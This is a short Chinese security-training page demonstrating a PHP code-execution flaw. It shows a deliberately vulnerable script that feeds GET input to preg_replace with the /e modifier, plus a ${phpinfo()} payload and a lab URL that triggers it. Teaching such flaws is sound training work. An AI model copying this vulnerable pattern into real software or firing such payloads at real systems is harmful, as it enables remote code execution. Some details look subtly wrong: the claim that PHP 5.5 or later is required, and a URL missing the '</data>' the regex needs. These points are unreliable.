代码执行漏洞一

程序源码如下:
<?php
    $data=$_GET['data'];
    echo $data;
    preg_replace('/(.*)<\/data>/e', '$ret="\\1";',$data);
    echo $ret;
?>
经过测试:
传值 ${phpinfo()} 可以执行,并且php版本要求5.5及以上版本
http://www.nanhack.com/eval/eval3.php?data=${phpinfo()}
© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2  
本站一切信息皆遵守中华人民共和国法律,如发现任何不良信息,请拨打电话:18622800700
网络安全培训、企业合作、院校合作: 15320004362(手机同微信)